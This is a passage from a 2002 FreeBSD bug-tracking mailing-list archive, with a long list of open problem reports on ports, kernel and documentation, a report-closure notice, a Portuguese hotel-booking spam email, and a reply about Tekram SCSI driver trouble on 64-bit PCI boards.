Patch to wdm to allow long passwords o [2002/07/02] bin/40127 [PATCH] Add functions for PID-file handli o [2002/07/02] ports/40128 ports [new port] games/groundhog o [2002/07/02] ports/40131 ports tclock fails to compile o [2002/07/02] ports/40137 ports New port: net/6to4 - enables 6to4 tunnels o [2002/07/03] ports/40140 trevor ports/audio/festvox-abc has a checksum er o [2002/07/03] www/40146 www http://www.freebsd.org/send-pr.html o [2002/07/03] kern/40155 No sound on Presario 700 laptop's ac97 co o [2002/07/03] ports/40161 ports [new port] games/xpired o [2002/07/03] ports/40163 cy screen w/o suid and locale o [2002/07/03] misc/40169 problem in latest 4.6-stable o [2002/07/03] ports/40171 obrien vim 6.1.118 cannot build o [2002/07/04] ports/40174 mi wordnet - wnb failes to run o [2002/07/04] ports/40179 ports port update: net/flow-tools 0.57 -> 0.58 o [2002/07/04] ports/40183 sobomax Updated Port audio/extace 1.4.5 -> 1.7.3 o [2002/07/04] ports/40191 ports New port: ap-utils - configure and monito o [2002/07/04] i386/40195 /usr/ports/audio/liba52 does not compile o [2002/07/04] docs/40196 doc man find does not describe -follow o [2002/07/04] misc/40197 BurnCD doesn't "just work" at 4.6-p1 o [2002/07/04] misc/40211 No sound on Compaq Presario 700 f [2002/07/05] ports/40226 ports New port: ldapdns - A dns server that ser o [2002/07/05] ports/40230 taoka ports/audio/mpg123.el has a checksum erro o [2002/07/05] docs/40234 doc Typos and language cleanup in /usr/share/ o [2002/07/05] ports/40235 ports New port: graphics/kbarcode - barcode gen o [2002/07/05] docs/40237 doc Typos in loader.conf.5 o [2002/07/05] ports/40238 ports New port: devel/antlr o [2002/07/05] ports/40239 ports New port: lang/gh (The Generic Haskell co o [2002/07/05] ports/40241 trevor Update port: biology/xdrawchem to 1.4 (fi f [2002/07/05] ports/40256 petef www/cgiwrap: add option for access contro o [2002/07/06] ports/40263 sobomax ports/x11-toolkits/easygtk file don't exi o [2002/07/06] ports/40271 anholt System CFLAGS not included everywhere in f [2002/07/06] misc/40273 dougb some more fortunes o [2002/07/06] ports/40275 ports New port: devel/aegis o [2002/07/06] ports/40276 ports slurp port overwrites/delete existing con o [2002/07/06] misc/40280 I add uscanner entory o [2002/07/07] ports/40284 ports ports/x11/djvuplugin tarball no longer ex o [2002/07/07] ports/40294 ports New port: emulators/gpsim o [2002/07/07] misc/40297 Seagate STT8000A (ast0) atapi tape drive o [2002/07/07] misc/40298 using swapfile as /tmp o [2002/07/07] conf/40302 imp New addition to /etc/defaults/pccard.conf o [2002/07/07] ports/40306 ports /usr/ports/games/an won't build o [2002/07/07] ports/40308 ports Can't build fileutils port on -STABLE o [2002/07/07] docs/40311 doc Typos and language adjustments to ipfw.8 o [2002/07/07] docs/40313 doc Grammar, wording, and clarifications for o [2002/07/07] ports/40324 markm security/pgp5 aborts on Pentium4 systems o [2002/07/08] misc/40325 UID changes not reflected in viewed file/ f [2002/07/08] ports/40326 ports ports/cad/leocad has a checksum error o [2002/07/08] misc/40331 libalias bug causes natd crashes f [2002/07/08] ports/40336 dinoex licq-qt-gui does not compile o [2002/07/08] ports/40337 nbm Update port: x11-wm/pwm - unfetchable dis o [2002/07/08] ports/40344 ports update of mail/ssmtp to 2.50.9 o [2002/07/08] ports/40347 ports editors/vim-lite is linked with libiconv o [2002/07/08] kern/40350 "apm: 16-bit connection error." message w o [2002/07/08] ports/40361 ports lang/cmucl dumps core o [2002/07/08] ports/40366 ports New port: graphics/openrm OpenGL based li o [2002/07/08] ports/40368 ports New port: games/gturing - A simple Turing o [2002/07/08] kern/40369 rman_reserve_resource - when "count > (en o [2002/07/09] ports/40372 ports ports/www/chtml mastersite has changed o [2002/07/09] ports/40374 ports databases/sqsh is built without readline o [2002/07/09] misc/40378 stdlib.h gives needless warnings with -an o [2002/07/09] ports/40383 ports New port: net/kxicq-devel o [2002/07/09] ports/40384 kde prob with libXext when compiling KDE3 p [2002/07/09] bin/40386 tjr Parsing problem with /bin/sh o [2002/07/09] ports/40388 nbm Upgrade for databases/phppgadmin o [2002/07/09] ports/40389 ports New port: linux_dri-devel (CVS linux DRI o [2002/07/09] conf/40391 sysinstall with PCCARD<->ISA bridge gets o [2002/07/09] ports/40393 anders Update to databases/mdbtools o [2002/07/09] ports/40396 ports New port: Logging daemon for Linksys BEFS o [2002/07/09] ports/40398 ports new port: gcc31bc o [2002/07/09] ports/40400 ports Update port: misc/gtktalog - A tool to ma o [2002/07/10] ports/40405 dirk ports/www/httrack has a checksum error o [2002/07/10] ports/40406 ports add optional IPv6 support to irc/epic4 o [2002/07/10] ports/40411 ports apache-jserv port points to wrong locatio o [2002/07/10] ports/40415 kde Upgrade of net/kio_fish to 1.1.2 o [2002/07/10] ports/40417 ports port for bozohttpd o [2002/07/10] ports/40418 dirk mkisofs does not function correctly o [2002/07/10] ports/40421 ports o [2002/07/10] docs/40423 doc Keyboard(4)'s definition of parameters to o [2002/07/10] misc/40430 Writing to DVD+RW using burncd does not w o [2002/07/10] docs/40443 doc Update books/faq/book.sgml for USB .ko's o [2002/07/10] ports/40444 ports graphics/libfpx won't build (on Alpha ??) o [2002/07/10] ports/40445 kris Update Port: security/rats to rats-1.5 o [2002/07/11] ports/40450 dinoex lang/pike fails to build on -current, due o [2002/07/11] ports/40452 ports ports/www/mod_auth_kerb mastersite doesn' o [2002/07/11] ports/40460 sobomax Update port: ftp/ftpcopy 0.4.8 -> 0.4.10 o [2002/07/11] ports/40461 ports New port MP3c , a cd to mp3 converter wit o [2002/07/11] docs/40465 trhodes ata(4) samples moved to atacontrol(4). o [2002/07/11] ports/40469 ports New port: gnome/bubblemon - A CPU and mem o [2002/07/11] ports/40470 ports ports tomcat3.3.1 not boot-autostart o [2002/07/11] ports/40472 ports request for new port o [2002/07/12] ports/40473 dinoex lang/pike looks for master.pike in the wr o [2002/07/12] ports/40474 ports Cannot make /usr/ports/graphics/gd2 o [2002/07/12] ports/40475 jkoshy ports/www/p5-HTML-Webmake has a checksum o [2002/07/12] ports/40482 nbm update of courier-imap port o [2002/07/12] kern/40486 [PATCH] kevent/kqueue does not work with p [2002/07/12] docs/40489 keramida ^Z in systat manpage o [2002/07/12] ports/40511 ports update for net/zebra (no-ipv6 option) o [2002/07/12] i386/40512 release i386 4.5 packages gnome/gnomeprin o [2002/07/12] ports/40514 ports New port: graphics/linux-ac3d easy to use o [2002/07/12] kern/40515 silby root gets ten extra processes, not one o [2002/07/12] kern/40516 ti driver has no buadrate set o [2002/07/13] ports/40519 ports qtella update to 0.53, qt3 o [2002/07/13] ports/40521 ports New ports math/blacs and math/scalapack: o [2002/07/13] ports/40525 ports [new port] mail/mew2-xemacs-devel-mule o [2002/07/13] ports/40528 kris Update port: security/snort o [2002/07/13] ports/40535 grog Updated Port benchmarks/rawio 1.1 -> 1.2 o [2002/07/13] conf/40537 imp add ata card entry to pccard.conf f [2002/07/13] bin/40538 dougb mergemaster fixes and enhancements o [2002/07/13] bin/40540 gshapiro allow multiple alias file to be defined i o [2002/07/13] ports/40541 ports New port: japanese/t2ps o [2002/07/13] kern/40543 /usr/src/sys/sys/proc.h:117: field `ar_ar o [2002/07/13] ports/40544 ports New port: postnuke o [2002/07/14] ports/40546 ports ports/www/php-screw has a checksum error o [2002/07/14] conf/40548 list of /etc/defaults/make.conf undocumme o [2002/07/14] misc/40552 alternate syscons font for iso-07 encodin o [2002/07/14] ports/40555 steve x11-toolkits/open-motif requires mkhtmlin o [2002/07/14] ports/40556 steve x11-toolkits/open-motif requires mkhtmlin o [2002/07/14] kern/40563 gif driver can clobber route/arp table o [2002/07/14] bin/40570 dhclient freeze the whole thing o [2002/07/14] ports/40571 portmgr Removes ancient USE_NEWGCC from ports o [2002/07/14] bin/40572 vipw prints silly message if $EDITOR fail o [2002/07/14] misc/40577 post-October 2001 Dell Inspiron 2500's (a o [2002/07/15] ports/40589 ports new port: games/lbreakout2 o [2002/07/15] ports/40590 ports new port: games/marbles o [2002/07/15] ports/40593 ports www/oops FreeBSD port does not obey BATCH o [2002/07/15] ports/40595 ports New port: databases/ora2pg o [2002/07/15] bin/40597 add /sbin/fdisk ability of showing extend o [2002/07/15] ports/40602 ports new port: security/clamav o [2002/07/15] ports/40607 ports New Port: rexima o [2002/07/15] ports/40608 kde Fix port: devel/kdesdk3 o [2002/07/15] kern/40611 [PATCH] linux JRE 1.4 under linux compati o [2002/07/15] ports/40614 ports New Port: Wyse 60 Terminal Emulator o [2002/07/15] bin/40617 brian /usr/sbin/ppp is not able to bind the nat f [2002/07/15] misc/40632 psm0 busy: o [2002/07/15] ports/40638 ports spamass-milter port hangs on multiple sim o [2002/07/16] ports/40642 ports ports/cad/slffea has a checksum error o [2002/07/16] ports/40644 ports New port: lang/bigloo - A Scheme interpre o [2002/07/16] ports/40645 kde kdeinit coredumps on KDE logout (11 signa o [2002/07/16] ports/40646 trevor Update port: graphics/qiv -> 1.8 o [2002/07/16] misc/40657 Logitech iFeel usb mouse will not attach o [2002/07/16] ports/40659 dirk php3 and GD problem o [2002/07/16] ports/40660 ports New Port: security/geheimnis-devel PGP/Gn o [2002/07/16] ports/40664 ports spamass-milter does not build on -CURRENT o [2002/07/16] ports/40668 sobomax Update port: ftp/ftpcopy -> 0.5.0 p [2002/07/16] standards/40669standardscommand command does not support `-p' opt o [2002/07/16] ports/40670 ade gettext: missing file in pkg-plist o [2002/07/16] misc/40671 pthread_cancel doesn't remove thread from o [2002/07/16] ports/40676 ports Fatal error building /usr/ports/security/ o [2002/07/17] ports/40679 ports New port: devel/ruby-yaml - A YAML serial o [2002/07/17] ports/40689 keith ports/chinese/dia file not found on maste o [2002/07/17] ports/40691 ports netscape 7 directory user default f [2002/07/17] misc/40693 the system reboot alone with no reason o [2002/07/17] ports/40694 ports New port biology/pymol Very beautiful mol o [2002/07/17] bin/40695 dwmalone typo in chown (chown.c) o [2002/07/17] ports/40699 ports allow exclude patterns in `make search` o [2002/07/17] ports/40700 ports New Port: security/libgcrypt General purp o [2002/07/17] www/40704 www Incorrect CGI settings in http://www.fi.F o [2002/07/17] ports/40705 ports Upgrade of gnome-commander to 0.9.8 a [2002/07/17] bin/40709 johan "-V" (very verbose) flag for chmod o [2002/07/17] kern/40711 CT5880-C sometimes fails to output sound o [2002/07/17] docs/40712 doc Release docs (under release/4.6R) and up o [2002/07/17] bin/40717 No ftpchroot.5 -> ftpusers.5 link o [2002/07/17] ports/40719 ports New port: net/ap-utils o [2002/07/18] ports/40726 ports [Fix] security/gpgme pkg-plist info files o [2002/07/18] ports/40727 ports New Port: security/libksba The X.509 Libr o [2002/07/18] ports/40732 naddy New port: editors/bitedit o [2002/07/18] ports/40734 ports Update port: audio/streamtuner o [2002/07/18] ports/40735 ports New port: streamtuner-local, a local MP3 o [2002/07/18] ports/40736 ports New port: streamtuner-live365, a Live365 o [2002/07/18] docs/40739 doc handbook/mirrors/chapter.sgml FTP Mirrors o [2002/07/18] ports/40742 ports DSSSL Modular stylesheets not added to sg o [2002/07/18] kern/40745 Inconsistency between net/if.c and struct o [2002/07/18] ports/40749 ports /palm/coldsync fails to compile o [2002/07/18] ports/40756 ports insecure default options o [2002/07/19] ports/40760 ports New port: mail/kavmilter o [2002/07/19] ports/40761 ports New port: graphics/ncarg o [2002/07/19] kern/40763 [UPDATED PATCH] Introduction of non-stric o [2002/07/19] ports/40768 ports New port: korean/netdic o [2002/07/19] bin/40771 dwmalone inetd.c 1.105 breaks inetd.conf parsing o o [2002/07/19] ports/40772 brian Update port: net/freeradius o [2002/07/19] ports/40775 ports New port: misc/rfksay o [2002/07/19] conf/40777 disktab does not support 2.88MB floppies o [2002/07/19] i386/40781 Xwindow server setup problem o [2002/07/19] ports/40782 ports New port: www/tidy-devel (latest version o [2002/07/19] ports/40784 ports ${PERL}->${REINPLACE_CMD} for unmaintaine o [2002/07/19] ports/40788 ports ports/net/ymessenger upgrade to 0.99.19- o [2002/07/19] ports/40789 ports New port: graphics/gocr OCR (Optical Char o [2002/07/19] ports/40791 ports find->${FIND},xargs->${XARGS} for unmaint o [2002/07/19] ports/40793 ports unbreak benchmarks/bonnie++ for -CURRENT o [2002/07/19] ports/40794 ade Update port: devel/gettext to 0.11.3 o [2002/07/19] ports/40800 deischen Nedit 5.3 portupgrade fails on -stable sy o [2002/07/20] conf/40803 default rc.conf option incorrect o [2002/07/20] ports/40804 gnome /usr/devel/atk port depends on pkgconfig o [2002/07/20] ports/40805 petef update www/p5-libwww to 5.65 o [2002/07/20] ports/40808 ports ports/chinese/metalist tarball not found o [2002/07/20] ports/40819 ports New port: editors/oooqs OpenOffice QuickS o [2002/07/20] ports/40821 mharo Update www/analog: update to 5.24 o [2002/07/21] ports/40828 ports [MAINTAINER UPDATE] Fix devel/hat for ben o [2002/07/21] ports/40833 ports update port: sysutils/fastest_cvsup - dis o [2002/07/21] ports/40834 ports New port: net/linux-jigdo o [2002/07/21] misc/40843 ee should be default editor of root o [2002/07/21] bin/40846 deprecated test(1) options in src/include o [2002/07/21] ports/40847 ports New Ports: x11/ksimus: Simulation of tech o [2002/07/21] ports/40848 ports reflect WITHOUT-X11 in package name for x o [2002/07/21] docs/40851 doc [PATCH] "mergemaster -p" in UPDATING's "C o [2002/07/21] conf/40855 psuedo-device bpf need note in LINT and G o [2002/07/21] ports/40860 lioux new port: graphics/mplayer-devel o [2002/07/21] docs/40862 doc [PATCH] corrections for snapshot section o [2002/07/21] i386/40863 4.6 release||Can't seem to get the XFree8 o [2002/07/21] ports/40865 ports Port of net/dhid is old. This PR updates o [2002/07/21] ports/40866 ports sml-nj port CM autoloading compilation pr o [2002/07/21] ports/40869 obrien Updated port: security/super from 3.14.0 o [2002/07/21] ports/40870 ports New port: graphics/animabob Interactive 3 o [2002/07/21] docs/40872 doc [PATCH] document potential WEP text key i o [2002/07/22] ports/40873 lioux Update port: devel/distcc - additional do o [2002/07/22] ports/40877 ports NEW xntp3 port! o [2002/07/22] ports/40881 alane Update bsd.sites.mk o [2002/07/22] ports/40892 ports New Port: lang/g95 o [2002/07/22] bin/40894 OpenSSH weird delays o [2002/07/22] ports/40897 ports Update port: graphics/ImageMagick o [2002/07/22] ports/40900 ports Update port: lang/guile o [2002/07/22] ports/40901 ports New Port: lang/gauche - An RSR5 Scheme de o [2002/07/22] ports/40904 ports new port: www/tclcurl o [2002/07/22] docs/40907 doc [PATCH] Typos in /usr/share/man/man7/tuni o [2002/07/22] docs/40909 doc [PATCH] Typos in /usr/share/man/man4/ukbd o [2002/07/22] docs/40910 doc [PATCH] Typos & grammer fixes for /usr/sh o [2002/07/22] docs/40911 doc [PATCH] Minor improvements for /usr/share o [2002/07/22] ports/40912 ports New port: Xtend X10 controller program o [2002/07/22] ports/40913 ports fix port: cad/pcb o [2002/07/22] ports/40914 ports New port: games/linux-nwserver Neverwinte o [2002/07/22] ports/40915 billf Fix pkg-plist for net/ethereal o [2002/07/23] ports/40916 ports New port: news/newspost o [2002/07/23] kern/40919 usage of ucred->cr_uid in sys/netinet/in_ o [2002/07/23] ports/40925 ports [new port] www/ljdeps - metaport for Live o [2002/07/23] kern/40926 After Upgrading or Clean Installing 4.6, o [2002/07/23] kern/40927 sound dies with pcm:play:0 play interrupt o [2002/07/23] ports/40930 knu Conditionally installing bin/ruby for rub o [2002/07/23] ports/40932 ports New Port: sysutils/uptimed o [2002/07/23] kern/40933 make depend fails when building kernel fr o [2002/07/23] ports/40935 ports New port: shells/scponly-2.3 (a tiny shel o [2002/07/23] ports/40942 ports New port: graphics/xrml Extensible scene o [2002/07/23] ports/40943 kris [PATCH] security/snortsnarf: Update to 02 o [2002/07/24] i386/40946 Possible way to cause a system to hang us o [2002/07/24] ports/40947 ports New port: sysutils/cvsdelta o [2002/07/24] kern/40948 USB HP CDW8200 does not work o [2002/07/24] docs/40951 doc Various fixes for the solid-state article o [2002/07/24] docs/40952 doc login.conf should mention that "idletime" o [2002/07/24] ports/40954 ports New port: ftp/jigdo f [2002/07/24] ports/40956 tobez New port: net/p5-Net-Whois-RIPE o [2002/07/24] i386/40957 rarpd on laptops doesn't find interfaces, o [2002/07/24] bin/40958 apm on Acer TravelMate 351 could not resu o [2002/07/24] bin/40960 cjc periodic security leaves tmp files behind o [2002/07/24] ports/40961 ports Update: mail/fetchmail (5.9.13) o [2002/07/24] ports/40962 portmgr bento - extra files layout change o [2002/07/24] ports/40963 billf [patch] editors/vigor mastersite has move o [2002/07/24] ports/40964 ports New port: textproc/docproj-jadetex & text o [2002/07/24] ports/40966 ports Update: net/ddup (3.0.1) o [2002/07/25] ports/40967 ports [new port] games/enigma - Oxyd like game o [2002/07/25] ports/40968 ports New port: Mail::RBL - Perl extension to a o [2002/07/25] docs/40969 doc intro(2) manpage still refers to PID 0 as o [2002/07/25] ports/40970 ports New port: misc/rpl o [2002/07/25] ports/40975 ports Uncatched coredump of pkg_info while pkgd o [2002/07/25] bin/40980 du(1)'s -h and -k options interact confus o [2002/07/25] ports/40981 ports mc does not work as viewer o [2002/07/25] ports/40983 keith Update port: chinese/CJK o [2002/07/25] ports/40990 ports new port: audio/xmms-surround o [2002/07/25] ports/40991 ports new port: audio/xmms-a52dec o [2002/07/25] ports/40992 naddy Update misc/shc 3.3 -> 3.4 and take over o [2002/07/25] misc/40993 v4.6 unable to install o [2002/07/25] ports/40994 ports fix port: x11/gxset o [2002/07/25] ports/40996 petef Update port: devel/tdl to 1.2 o [2002/07/26] ports/41000 ports net/ppxp: fix to build with the latest xf o [2002/07/26] kern/41010 HP 315 Digital camera, SCSI quirks o [2002/07/26] bin/41012 /etc/periodic/daily/440.status-mailq assu o [2002/07/26] ports/41016 ports Update Port astro/ksetiwatch o [2002/07/26] ports/41017 ports Updated port audio/id3lib o [2002/07/26] ports/41018 ports 'screen' binary eats CPU on 4.6-RELEASE , o [2002/07/26] ports/41019 ports New Port: audio/kmp3indexer generates an o [2002/07/26] ports/41022 ports New Port: graphics/kmencoder A mencoder F o [2002/07/26] ports/41027 ports Update port: cad/gerbv o [2002/07/26] ports/41028 ports Update port: cad/qcad to 1.4.16 o [2002/07/26] ports/41029 ports Update port: devel/libshbuf o [2002/07/26] docs/41034 doc [PATCH] Typos in /etc/named/named.conf co o [2002/07/26] misc/41035 http://www.freebsd.org/doc/en_US.ISO8859- o [2002/07/27] ports/41036 ports New port: x11-wm/wmDeskGuide, a dockbar p o [2002/07/27] ports/41040 ports Unbreak devel/crystal (problem with nasm o [2002/07/27] ports/41042 trevor Change print/acroread5 ln's command to -s o [2002/07/27] standards/41043ache Incorrect date format in Swedish locale. o [2002/07/27] ports/41045 dirk Build www/mod_php4 with --enable-track-va o [2002/07/27] docs/41049 doc [PATCH] cleanup of elements o [2002/07/27] ports/41051 ports Update port: lang/ghc - avoid problems wi o [2002/07/27] ports/41055 ports New Port: audio/swhplugins A huge collect o [2002/07/27] ports/41056 ports Apply -pedantic fix and user-smubmitted p o [2002/07/27] bin/41060 ready to import gzip 1.3.3 o [2002/07/27] ports/41061 ports New port: archivers/gzip (1.3.3) o [2002/07/27] i386/41062 install: file.1.gz: No such file or direc o [2002/07/27] kern/41063 sos Typo o [2002/07/27] misc/41064 can't make world: ===> share/doc/papers/k o [2002/07/27] ports/41066 ports update port: print/ttf2pt1 to 3.4.1 o [2002/07/27] ports/41068 pat [Update Port] games/xqf (Version Bump) o [2002/07/27] bin/41070 jmallett added .warning in make(1) + two fixes o [2002/07/27] bin/41071 make NO to NO_ transition patch o [2002/07/27] ports/41072 ports [maintainer-update] games/sopwidth: inval o [2002/07/27] ports/41074 dirk mysql323-server doesn't compile on i386 c o [2002/07/28] kern/41081 Add USB device ID for USB Flash disk driv o [2002/07/28] ports/41082 ports New port: emulators/dosbox - emulator of o [2002/07/28] conf/41083 sound configuration o [2002/07/28] ports/41084 ports New Ports / archivers/untar o [2002/07/28] ports/41086 petef Update security/ssh-multiadd to version 1 o [2002/07/28] ports/41087 ports New port: mail/imapfilter o [2002/07/28] docs/41089 doc pax -B option does not mention interactio o [2002/07/28] ports/41090 ports update irc/olirc to 0.0.38-alpha-3.2 o [2002/07/28] ports/41092 ports patch: unbreak devel/zziplib o [2002/07/28] ports/41093 ports patch: fix x11-toolkits/xview o [2002/07/28] ports/41094 ports java/linux-ibm-jdk13 checksum mismatch o [2002/07/28] ports/41095 ports patch: unbreak games/xpat2 o [2002/07/28] ports/41096 ports update irc/rbot port to 0.9.5 o [2002/07/28] ports/41097 ports patch: fix graphics/xmms-xvs o [2002/07/28] ports/41098 ports patch: sed-ify, fix depends for graphics/ o [2002/07/28] ports/41099 ports patch: fix emulators/xmess o [2002/07/28] ports/41100 ports patch: fix dependencies for net/xisp o [2002/07/28] ports/41101 ports patch: fix editors/xed o [2002/07/28] ports/41102 ports Update port: textproc/fop - correct deps o [2002/07/28] docs/41103 doc Promise ATA133 chip missing from supporte o [2002/07/28] docs/41104 imp Stale comment removal from pccardd(8) o [2002/07/28] ports/41105 ports New port: graphics/renderpark System for o [2002/07/29] docs/41106 doc FreeBSD Handbook lacks "Desktop Applicati o [2002/07/29] misc/41107 file(1) command shows incorrect data (sig o [2002/07/29] ports/41108 ports editors/vim does not build gnome-gui for o [2002/07/29] docs/41109 doc Handbook lacks IPv6 information o [2002/07/29] docs/41110 doc "apropos linux" doesn't find brandelf o [2002/07/29] ports/41112 ports Update misc/mango to version 0.16 (SUPERC o [2002/07/29] ports/41113 ports New port: net/mydns o [2002/07/29] ports/41116 ports update port: news/cleanfeed o [2002/07/29] misc/41117 òÁÂÏÔÁ Ó ÇÒÁÆÉÞÅÓËÉÍ ÞÉÐÏÍ i815 o [2002/07/29] ports/41118 ports Update ports: graphics/divxcalc -> 0.3 o [2002/07/29] ports/41119 ports subversion port not fetchable o [2002/07/29] ports/41120 ports x11-toolkits/gal not building o [2002/07/29] ports/41121 ports print/acroread5: 2 sed_inplace problems o [2002/07/29] ports/41122 ports x11/gnomecore doesn't build o [2002/07/29] ports/41123 ports updated cfengine MASTER_SITES o [2002/07/29] ports/41124 ports www/phpbb 2.0.0 -> 2.0.1 up o [2002/07/29] ports/41126 ports update graphics/jhead port 2513 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 11:36:45 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D132837B400; Mon, 29 Jul 2002 11:36:43 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8585E43E31; Mon, 29 Jul 2002 11:36:43 -0700 (PDT) (envelope-from bmah@FreeBSD.org) Received: from freefall.freebsd.org (bmah@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TIahJU030159; Mon, 29 Jul 2002 11:36:43 -0700 (PDT) (envelope-from bmah@freefall.freebsd.org) Received: (from bmah@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TIahpt030155; Mon, 29 Jul 2002 11:36:43 -0700 (PDT) Date: Mon, 29 Jul 2002 11:36:43 -0700 (PDT) From: "Bruce A. Mah" Message-Id: <200207291836.g6TIahpt030155@freefall.freebsd.org> To: ripper@eskimo.com, bmah@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/40842: ppp.conf examples directory is empty Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ppp.conf examples directory is empty State-Changed-From-To: open->closed State-Changed-By: bmah State-Changed-When: Mon Jul 29 11:34:41 PDT 2002 State-Changed-Why: This problem was caused by some Makefile bugs. These have been fixed in CURRENT, 4.6-STABLE, and the 4.6 security fix branch. http://www.freebsd.org/cgi/query-pr.cgi?pr=40842 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 12:10:50 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 203D937B400; Mon, 29 Jul 2002 12:10:22 -0700 (PDT) Received: from terra.com.br (cr20068160127.cable.net.co [200.68.160.127]) by mx1.FreeBSD.org (Postfix) with SMTP id C7C5343E31; Mon, 29 Jul 2002 12:08:44 -0700 (PDT) (envelope-from atendimentoatendimento@bol.com.br) Reply-To: "Atendimento online" From: "Atendimento online" Subject: Reserva Date: Fri, 26 Jul 2002 16:27:51 -0300 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0195_01C234C1.64744870" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020729190844.C7C5343E31@mx1.FreeBSD.org> To: undisclosed-recipients: ; Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0195_01C234C1.64744870 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Reserva imediata em seu hotel ? =20 Para que seus h=F3spedes possam ter a facilidade de fazer uma reserva = on-line,=20 estamos oferecendo o servi=E7o de atendimento on-line para seu hotel. Fa=E7a um teste gratuito: mensagemdigital.com/atendimentoonline e-mail: atendimentoonline@mensagemdigital.com=20 Atenciosamente, (11) 5082-1515 Desculpe-nos se nosso contado foi inoportuno ou n=E3o lhe interessa.=20 Click aqui para ser removido de nosso mailing.=20 ------=_NextPart_000_0195_01C234C1.64744870 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

Reserva = imediata em seu=20 hotel ?

Para que seus h=F3spedes possam ter a facilidade de fazer uma = reserva=20 on-line, 
estamos oferecendo o servi=E7o de atendimento on-line = para seu=20 hotel.
Fa=E7a um teste gratuito: mens= agemdigital.com/atendimentoonline

e-mail: atendimentoonline@m= ensagemdigital.com 

Atenciosamente,

(11) 5082-1515

Desculpe-nos se nosso = contado foi=20 inoportuno ou n=E3o lhe interessa.
Click aqui = para ser=20 removido de nosso  mailing.

------=_NextPart_000_0195_01C234C1.64744870-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 16:19:33 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1F7A437B405 for ; Mon, 29 Jul 2002 16:19:25 -0700 (PDT) Received: from postal1.lbl.gov (postal1.lbl.gov [128.3.7.82]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3D90043E5E for ; Mon, 29 Jul 2002 16:19:23 -0700 (PDT) (envelope-from j_guojun@lbl.gov) Received: from postal1.lbl.gov (localhost [127.0.0.1]) by postal1.lbl.gov (8.11.2/8.11.2) with ESMTP id g6TNJM716664 for ; Mon, 29 Jul 2002 16:19:22 -0700 (PDT) Received: from lbl.gov (gracie.lbl.gov [131.243.2.175]) by postal1.lbl.gov (8.11.2/8.11.2) with ESMTP id g6TNJLi16655; Mon, 29 Jul 2002 16:19:21 -0700 (PDT) Message-ID: <3D45CD75.5BCB005B@lbl.gov> Date: Mon, 29 Jul 2002 16:19:17 -0700 From: "Jin Guojun [DSD]" X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: zh, zh-CN, en MIME-Version: 1.0 To: "P. Jourdan" , freebsd-bugs@FreeBSD.org Subject: Re: kern/40895: wierd kernel / device driver bug [was:TekramDC390U3w] References: <20020724173604.W77797-100000@server.arg.sj.co.uk> <5.1.0.14.2.20020725110828.00aad1e0@pop.videotron.ca> <5.1.0.14.2.20020728192445.00aa2f58@pop.videotron.ca> <5.1.0.14.2.20020729185457.00ac0c40@pop.videotron.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "P. Jourdan" wrote: > At 10:25 AM 7/29/2002 -0700, you wrote: > > >I did not see any BIOS update for SCSI controller )-: > >The BIOS update is for motherboard only. > >Have you used 390U3W on any 64-bit PCI motherboard? > > No. I have not. > > Sorry, Jin, > I'm afraid I am not very well informed on this stuff. > The last suggestion I can give is to contact the German tech support office > for Tekram. They're listed in the Tekram support site. I think they are a > bit more awake than the taiwan office. :(( > Phil You have been great help. I believe this is not a Tekram problem. It more likely is in the FreeBSD driver to deal with 64-bit PCI. It also may be a problem between SYM and other SCSI drivers as you indicated you only had SYM driver in the kernel. The ASUS P2B I used acturally is P2B-LS, which has an Adaptic SCSI controller on board. Even after I took 390U3W out, FreeBSD 4.6 still cannot be installed on this motherboard. It loops forever after probe SCSI -- Waiting 6 seconds for SCSI devices to settle kernel spits something related to "aic" controller again and again. I will remove all other SCSI drivers from the kerenl and try again. Thanks, -- ------------ Jin Guojun ----------- v --- j_guojun@lbl.gov --- Distributed Systems Department http://www.itg.lbl.gov/~jin M/S 50B-2239 Ph#:(510) 486-7531 Fax: 486-6363 Lawrence Berkeley National Laboratory, Berkeley, CA 94720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jul 29 19:30: 8 2002 Delivered-To: 